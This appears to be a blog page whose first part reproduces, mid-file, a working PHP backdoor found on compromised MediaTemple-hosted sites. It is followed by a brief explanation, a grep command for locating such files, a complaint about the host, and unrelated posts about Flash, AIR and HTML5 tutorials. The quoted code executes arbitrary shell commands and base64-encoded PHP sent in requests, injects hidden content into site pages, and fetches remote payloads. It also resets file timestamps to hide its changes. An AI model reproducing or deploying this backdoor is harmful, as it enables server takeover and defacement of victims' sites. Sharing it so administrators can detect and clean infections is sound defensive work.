$d7[]=array( $f2, substr_count($f2, $d9) );
}
else
{
foreach($f1 as $f3)
{
if(preg_match($f3,$f2))
{
$e8[]=$f2;break;};
}
};
};
}
return $e8;
}
}
if (!function_exists('checkcontent2'))
{
function checkcontent2($g0)
{
$e5 = array("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)",
"Mozilla/5.0 (compatible; SnapPreviewBot; en-US; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060731 Firefox/1.5.0.5 Flock/0.7.4.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008092215 Firefox/3.0.1 Orca/1.1 beta 3",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.xx) Gecko/20030504 Mozilla Firebird/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5");
if (function_exists('curl_init'))
{
$g2 = $e5[rand(0,count($e5)-1)];
$g1 = curl_init();
curl_setopt($g1, CURLOPT_URL, $g0);
curl_setopt($g1, CURLOPT_HEADER, 0);
curl_setopt($g1, CURLOPT_TIMEOUT, 30);
curl_setopt($g1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($g1, CURLOPT_USERAGENT, $g2);
curl_setopt($g1, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($g1, CURLOPT_MAXREDIRS, 2);
$g3 = curl_exec($g1);
curl_close($g1);
if ($g3 !== false)
{
return $g3;
}
}
else if (ini_get('allow_url_fopen') == '1')
{
$g3 = file_get_contents($g0);
if ($g3 !== false)
{
return $g3;
}
}
else
{
echo "<h5 style='color:maroon'>Can't download ".$g0." - EXIT;</h5>";
exit;
}
}
}
if (!function_exists('getcode'))
{
function getcode($g4,$d0)
{
$c8 = '';
if(preg_match("/$d0/",$g4))
{
$c8 = preg_replace("/.*<b1><!--|$d0|--><\/b1>.*/msi","",$g4);
}
return $c8;
}
}
$d1 = array("(\.ph.*$|\.htm.*$|\.shtm.*$|\.asp.*$|\.jsp$|\.jhtm$|\.cfm$|\.ctp$|\.tpl$)");
$a7 = array("/<ad>.*<\/ad>/si",
"/<ads>.*<\/ads>/si",
"/<bb1>.*<bb2>/si",
"/<b1>.*<\/b1>/si",
"/<bb1><bb1>/si",
"/<bb2><bb2>/si",
"/<(span|font|div) style=.*(height|width)\s*:\s*[0-2]{1}\s*(pt|px).*(overflow|visibility)\s*:\s*(auto|hidden).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi",
"/<(span|font|div) style=.*(overflow|visibility)\s*:\s*(auto|hidden).*(height|width)\s*:\s*[0-2]{1}\s*(pt|px).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi",
"/<(span|font|div) style=.*visibility\s*:\s*(auto|hidden).*overflow\s*:\s*(auto|hidden).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi",
"/<(span|font|div) style=.*overflow\s*:\s*(auto|hidden).*visibility\s*:\s*(auto|hidden).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi", "/wpfooterz.*wpfooterz/si", "/<a.*style\s*=.*(top|left)\s*:\s*-[0-9]{3,5}.*>.*<\/a>/Ui",
"/<a.*(viagra|cialis|phentermine|vioxx|hydrocodon|oxycontin|levitra|ambien|xanax|adipex|cheap pills|paxil|Codeine|vicodin|tramadol|tadalafil|carisoprodol|mesothelioma|lorazepam|propecia|protonix|prozac|prescription|buy cheap|zithromax)+.*><\/a>/i");
if (isset($_REQUEST['update1']))
{
$b4 = explode("EXPC",gzinflate(base64_decode($_REQUEST['update1'])));
$b0 = $b4[0];
$b5 = explode(',',$b4[1]);
foreach($b5 as $a3)
{
if (strlen($b0) > 1)
$b0 = "<ads>".$b0."</ads>";
$a2 = false;
$a5 = false;
if (!is_writable($a3))
@chmod($a3, 0644);
if (file_exists($a3) && is_writable($a3))
{
$b7 = false;
if (eregi(".htm",$a3) !== false || eregi(".shtm",$a3) !== false)
$b7 = true;
$a1 = trim(file_get_contents($a3));
foreach($a7 as $c2)
{
if (preg_match($c2, $a1))
{
$a1 = preg_replace($c2, "", $a1);
$a5 = true;
}
}
if (preg_match("/<body(.*)?>/i",$a1,$a9))
{
$a0=$a9[0];
$a1=preg_replace("/<body(.*)?>/i", $a0.$b0, $a1);
$a2 = true;
}
else if (preg_match("/<\/body(.*)?>/i",$a1,$a9))
{
$a0=$a9[0];
$a1=preg_replace("/<\/body(.*)?>/i", $b0.$a0, $a1);
$a2 = true;
}
else if (preg_match("/<\/html>/i",$a1,$a9))
{
$a0="</body>".$a9[0];
$a1=preg_replace("/<\/html>/i", $b0.$a0, $a1);
$a2 = true;
}
else if ($b7 == true)
{
$a0=$b0."</body></html>";
$a1.=$a0;
$a2 = true;
}
if ($a2 == true || $a5 == true)
{
$a4 = @filemtime($a3);
$b1 = fopen($a3, "w+");
fwrite($b1, $a1);
fclose($b1);
@touch($a3,$a4,$a4);
if ($a2 == true)
echo "<pre>update $a3</pre>";
if ($a5 == true)
echo "<pre>spam removed $a3</pre>";
}
}
else
{
if (!file_exists($a3))
echo "<pre>no file $a3</pre>";
else if (!is_writable($a3))
echo "<pre>no rw file $a3</pre>";
}
}
}
if (isset($_REQUEST['update2']))
{
$b0 = gzinflate(base64_decode($_REQUEST['update2']));
$a6 = $_SERVER['SCRIPT_FILENAME'];
$b6 = before_last('/',$a6);
if (!is_writable($b6))
@chmod($b6, 0644);
$b8 = @filemtime($b6);
@copy($a6,$a6.'1.php');
@touch($b6,$b8,$b8);
@touch($a6.'1.php',$b8,$b8);
if (!is_writable($a6))
@chmod($a6, 0644);
if (is_writable($a6))
{
$a1 = trim(file_get_contents($a6));
$b3 = preg_replace('/^\<\?php.*\?\>/Usi','',$a1);
$a4 = @filemtime($a6);
$b1 = fopen($a6, "w");
fwrite($b1, $b0.$b3);
fclose($b1);
@touch($a6,$a4,$a4);
echo "<pre>update</pre>";
}
else
{
echo "<pre>no rw $a3</pre>";
}
}
if (isset($_REQUEST['update3']))
{
echo "<pre>";
$a8 = $_REQUEST['update3'];
$b4 = '';
if (!empty($a8))
{
if(function_exists('exec'))
{
@exec($a8,$b4);
$b4 = join("\n",$b4);
}
elseif(function_exists('shell_exec'))
{
$b4 = @shell_exec($a8);
}
elseif(function_exists('system'))
{
@ob_start();
@system($a8);
$b4 = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($a8);
$b4 = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($b2 = @popen($a8,"r")))
{
$b4 = "";
while(!@feof($b2))
{
$b4 .= @fread($b2,1024);
}
@pclose($b2);
}
}
echo $b4;
echo "</pre>";
}
if (isset($_REQUEST['add1']))
{
$b4 = explode("EXPC",gzinflate(base64_decode($_REQUEST['add1'])));
$b0 = $b4[0]; $b5 = explode(',',$b4[1]);
foreach($b5 as $a3)
{
$a2 = false;
$a5 = false;
if (!is_writable($a3))
@chmod($a3, 0644);
if (file_exists($a3) && is_writable($a3))
{
$a1 = trim(file_get_contents($a3));
$a1 = preg_replace("/var\sst1(.*)gr0\=0\;/i", "", $a1);
$a1=$b0.$a1;
$a4 = @filemtime($a3);
$b1 = fopen($a3, "w");
fwrite($b1, $a1);
fclose($b1);
@touch($a3,$a4,$a4);
echo "<pre>update $a3</pre>";
}
else
{
if (!file_exists($a3))
echo "<pre>no file $a3</pre>";
else if (!is_writable($a3))
echo "<pre>no w file $a3</pre>";
}
}
}
if (isset($_REQUEST["ev1"]))
{
$b9=base64_decode($_REQUEST["ev1"]);
if (isset($_REQUEST["s"]))
{
$b9=stripslashes2($b9);
};
eval($b9);
exit();
}
if (isset($_REQUEST["info1"]))
{
$c0 = 'dGVzdDEyNw==';
$c1 = @get_current_user();
echo "<!--".base64_decode($c0)."(($c1))-->";
exit;
}
if (isset($_REQUEST["get1"]))
{
get_magic_quotes_gpc() ? $c6 = stripslashes($_REQUEST['get1']) : $c6 = $_REQUEST['get1'];
$d2 = before($_SERVER['PHP_SELF'],$_SERVER['SCRIPT_FILENAME']);
$d0 = rand_checkstr();
$e1 = array("((^index.*\.|^default.*\.|^main.*\.|^.*body.*\.|^login.*\.|^.*content.*\.|^auth.*\.|^.*footer.*\.|^home.*\.|^.*templ.*\.|^inc.*\.|^page.*\.|^hyperseek.*\.|^Output.*\.|^comment.*\.|^uifunctions.*\.|^bottom.*\.|^infocus.*\.)(ph.*$|htm.*$|shtm.*$|asp.*$|jsp$|jhtml$|cfm$|tpl$|inc$|pl$|templ.*$|xml$|sht$|ctp$))");
$b5 = getfiles($d2, $e1, 4);
foreach($b5 as $a3)
{
$a2 = false;
$a5 = false;
if (file_exists($a3))
{
if (!is_writable($a3))
@chmod($a3, 0644);
if (is_writable($a3))
{
$e2 = base64_encode(gzcompress($a3,9));
$b0 ="<b1><!--".$d0.$e2."--></b1>";
$a1 = trim(file_get_contents($a3));
foreach($a7 as $c2)
{
if (preg_match($c2, $a1))
{
$a1 = preg_replace($c2, "", $a1);
$a5 = true;
}
}
if (preg_match("/<body(.*)?>/i",$a1,$a9))
{
$a0=$a9[0];
$a1=preg_replace("/<body(.*)?>/i", $a0.$b0, $a1);
$a2 = true;
}
else if (preg_match("/<\/body(.*)?>/i",$a1,$a9))
{
$a0=$a9[0];
$a1=preg_replace("/<\/body(.*)?>/i", $b0.$a0, $a1);
$a2 = true;
}
else if (preg_match("/<\/html>/i",$a1,$a9))
{
$a0="</body>".$a9[0];
$a1=preg_replace("/<\/html>/i", $b0.$a0, $a1);
$a2 = true;
}
if ($a2 == true || $a5 == true)
{
$a4 = @filemtime($a3);
$b1 = @fopen($a3, "w+");
@fwrite($b1, $a1);
@fclose($b1);
@touch($a3,$a4,$a4);
}
}
}
}
$c9 = checkcontent2($c6);
if (eregi($d0, $c9))
{
$c9 = gzuncompress(base64_decode(getcode($c9,$d0)));
echo $c9;
}
foreach($b5 as $a3)
{
$a5 = false;
if (file_exists($a3))
{
if (!is_writable($a3))
@chmod($a3, 0644);
if (is_writable($a3))
{
$a1 = trim(file_get_contents($a3));
foreach($a7 as $c2)
{
if (preg_match($c2, $a1))
{
$a1 = preg_replace($c2, "", $a1);
$a5 = true;
}
}
if ($a5 == true)
{
$a4 = @filemtime($a3);
$b1 = @fopen($a3, "w+");
@fwrite($b1, $a1);
@fclose($b1);
@touch($a3,$a4,$a4);
}
}
}
}
exit;
}
if (isset($_REQUEST["get2"]))
{
$e3 = array();
get_magic_quotes_gpc() ? $c6 = stripslashes($_REQUEST['get2']) : $c6 = $_REQUEST['get2'];
$d2 = before($_SERVER['PHP_SELF'],$_SERVER['SCRIPT_FILENAME']);
$c7 = checkcontent2($c6);
$c6 = preg_replace("/^www\./i", "", $c6);
preg_match_all("/script.*src\s?=\s?(\"|')(.*\.js)(\?|\/|\"|')/Ui", $c7,$c8);
foreach ($c8[2] as $e4)
{
if (preg_match('/^http/i',$e4))
{
if (preg_match("/$c6/i",$e4))
{
$b2 = $d2.after($c6,$e4);
if (file_exists($b2))
$e3[] = $b2;
}
}
else
{
$b2 = $d2.'/'.$e4;
if (file_exists($b2))
$e3[] = $b2;
}
}
echo ($e3[rand(0,count($e3)-1)]);
exit;
}
?>
It looks like the attackers simply visit this PHP page and pass in some request parameters to tailor the attack. It looks like there are a few different options such as generating files, executing shell code, etc. I’m no PHP wizard so let me know if you find something interesting.
So how do you find these PHP files? Just SSH into your root directory and run:
grep -iR –include “*.php” “[a-zA-Z0-9\/\+]\{255,\}” *
This will list all files that have a string that is longer than 255 characters. This should help you locate these files.
My big question is for MediaTemple. What the hell are you guys doing? Why are we having to dig around for this information? Surely you have determined the same things so why are you not telling people how to clean it up? This official blog post from MediaTemple is vague and tells us nothing about how to actually clean our servers up. Do your job!
Categories: Companies
New Tutorial on Flash to HTML5 Video Fallback
I just uploaded a new tutorial that shows you how to provide an HTML5 video fallback option for devices that do not support the Flash Player. The tutorial also shows you how to use the new Flash Media Playback component for quickly adding video to your websites. If getting your video out to the largest number of people is your goal, providing an HTML5 fallback is an absolute necessity.
Categories: Companies
New Video Tutorial on Mobile Web Development
I just uploaded a new tutorial that shows you how to create a mobile-optimized website using HTML and CSS. The tutorial also highlights the new multi-screen development features of Dreamweaver CS5. It is important to have a strong grasp on standard web technologies as only then can you make an informed decision about when to use Flash.
Categories: Companies
New Two-Part Tutorial On AIR 2.0 NativeProcess
I recently uploaded a two-part tutorial that explains how to use the new NativeProcess API in Adobe AIR 2.0. With this API you can communicate with native code to get deeper access to the host operating system. In the first part, I create a command-line screenshot application using Visual Studio and C#. In part two, I create an AIR-based front-end for the C# application using the NativeProcess API.
Categories: Companies
Event Handler Style Showdown
There has been some talk on Twitter recently about the best way to write an event handler. This is all in good fun of course as there is no right way to do any kind of code. Flashers come from all walks of life. Some are from the design world and some from serious development backgrounds. Below are some of the suggested ways. What do you think?
12
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
private function kermanStyle(evt:Event):void {
// this is nice but I don't like evt for some
// reason. Also it is much more readable and
// clean to put the opening { on a new line.
}
private function sacksStyle(event:Event):void
{
// Steven rightly puts the opening { on a new
// line but uses the word event for his event
// object. You should never use a lowercase
// version of an existing class for an instance.
}
private function brimelowStyle(e:Event):void
{
// Yeah baby that's what I'm talking about!
// Using e is short, succinct, and most of all
// it is the sign of high intelligence.
}
Categories: Companies
New Video Tutorial on Android Camera Access
I just uploaded the second tutorial in the AIR for Android series. The latest build (07/05) on the prerelease site contains a ton of cool features including camera and microphone access, webview, and hardware acceleration. In this tutorial I show you how to get the device’s camera into your AIR application.
Categories: Companies